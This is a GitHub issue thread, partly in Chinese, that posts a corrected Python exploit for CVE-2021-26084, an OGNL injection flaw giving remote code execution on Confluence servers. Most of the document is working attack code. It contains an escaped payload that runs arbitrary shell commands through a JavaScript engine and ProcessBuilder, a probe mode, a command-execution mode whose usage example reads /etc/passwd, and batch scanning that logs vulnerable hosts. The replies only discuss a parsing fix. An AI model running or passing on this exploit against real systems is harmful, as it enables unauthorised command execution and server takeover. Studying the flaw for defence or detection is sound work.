
附上可用的code,解决标签定位的小问题,非常感谢作者提供的代码! #2

Closed
Kar1chan opened this issue Sep 2, 2021 · 2 comments


Kar1chan commented Sep 2, 2021

第56行修改method="POST" 为method="post"

附上可用的code:

#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
@File    :   PoC.py
@Time    :   2021/09/01 14:16:26
@Author  :   _0xf4n9x_
@Version :   1.0
@Contact :   fanq.xu@gmail.com
"""


import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup
urllib3.disable_warnings()  # mutes urllib3 warnings, e.g. the InsecureRequestWarning raised by the verify=False calls below


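def usage():
    """Print example invocations: single-URL probe, probe plus command, and batch-file mode."""
    print("Eg: \n    python3 PoC.py -u http://127.0.0.1")
    # Scheme typo fixed in the second example ("httts" -> "https").
    print("    python3 PoC.py -u https://127.0.0.1 -e 'cat /etc/passwd'")
    print("    python3 PoC.py -f urls.txt")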


def poc(host):
    """Probe *host* for CVE-2021-26084 and report the outcome on stdout.

    POSTs a form body to ``/pages/doenterpagevariables.action`` whose
    ``queryString`` field carries an OGNL expression written with
    backslash-u escapes (``\\u0027``, ``\\u0022``); the expression runs
    ``ifconfig`` server-side and the verdict is taken from the response
    text.  Returns 1 when the marker string is found, otherwise ``None``
    (both the "not vulnerable" path and any swallowed request error).

    Detection note: the request itself is an ordinary form POST with a
    Firefox User-Agent; the distinguishing feature is a ``queryString``
    value dense with ``\\u0027``/``\\u0022`` escapes and ``Class.forName``
    text aimed at that endpoint.
    """
    url = host + "/pages/doenterpagevariables.action"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-Type": "application/x-www-form-urlencoded"}
    # Form-encoded payload: the escaped OGNL loads ScriptEngineManager and
    # evaluates JavaScript that runs `ifconfig` through ProcessBuilder.
    params = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ifconfig\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
    try:
        # verify=False: the server certificate is not checked.
        res = requests.post(url, headers=headers, data=params,
                            timeout=10, verify=False)
        # NOTE: this parses as `'netmask' and 'inet' and ('netmask' in res.text)`;
        # the two bare strings are always truthy, so only the final membership
        # test decides the branch.
        if 'netmask' and 'inet' and 'netmask' in res.text:
            print("[+] " + host + " is vulnerable!")
            return 1
        else:
            print("[-] " + host + " is not vulnerable!")
    except:
        # Bare except: timeouts, connection errors and anything else are
        # silently swallowed; the caller only sees the implicit None.
        pass


def exp(host, command):
    """Send *command* to *host* through the same injection as poc() and print the result.

    Same endpoint, headers and escaped-OGNL template as :func:`poc`, but
    ``ifconfig`` is replaced by *command*, which is spliced into the template
    verbatim.  The full response body is printed first; then the ``value`` of
    the second ``<input>`` inside the first ``method="post"`` form is printed
    with the ``aaaaaaaa[`` prefix and trailing ``\\n]`` removed (presumably
    the reflected expression result).  There is no error handling: request
    failures, a missing form (``AttributeError``) or a form with fewer than
    two inputs (``IndexError``) propagate to the caller.
    """
    url = host + "/pages/doenterpagevariables.action"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-Type": "application/x-www-form-urlencoded"}
    params = {
        "queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}

    # TLS verification disabled, as in poc(); only the body text is kept.
    res = requests.post(url, headers=headers, data=params,
                        timeout=10, verify=False).text
    print(res)
    soup = BeautifulSoup(res, "html5lib")
    # The attribute match is exact and case-sensitive ("post", not "POST"),
    # which is the tag-positioning fix this issue reports.
    content = soup.find(method="post").find_all('input')[1]["value"]

    print(content.replace('aaaaaaaa[', '').replace('\n]', ''))


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2021-26084 Remote Code Execution on Confluence Servers")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-e', '--exec', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    # Dispatch is keyed on the raw argv length and flag positions rather than
    # on which parsed attributes are set: "-u URL" / "-f FILE" give length 3,
    # "-u URL -e CMD" gives 5.  Any other shape falls through to the help text.
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            # A missing or non-regular file is ignored without any message.
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    hosts = []  # dead assignment; overwritten on the next line
                    hosts = target.read().splitlines()
                    for host in hosts:
                        # poc() returns 1 only on its "vulnerable" branch, None otherwise.
                        if poc(host) == 1:
                            # Append mode, so repeated runs accumulate in success.txt.
                            with open("success.txt", "a+") as f:
                                f.write(host + "\n")
    elif len(sys.argv) == 5:
        # Proper-subset test: both flags must come from the -u/-e family, in
        # either order.  It does not require one of each, so e.g. "-u A -u B"
        # also passes and reaches exp() with args.exec still None.
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-e', '--exec']):
            # exp() is only attempted after the probe reports the host vulnerable.
            if poc(args.url) == 1:
                exp(args.url, args.exec)
    else:
        parser.print_help()
        usage()


0xf4n9x commented Sep 2, 2021

Updated the code for tag positioning; credit to CVE-2021-26084_Confluence.

    content = soup.find('input', attrs={'name': 'queryString', 'type': 'hidden'})['value']

@0xf4n9x 0xf4n9x closed this as completed Sep 2, 2021

0xf4n9x commented Sep 2, 2021

Thank you very much!
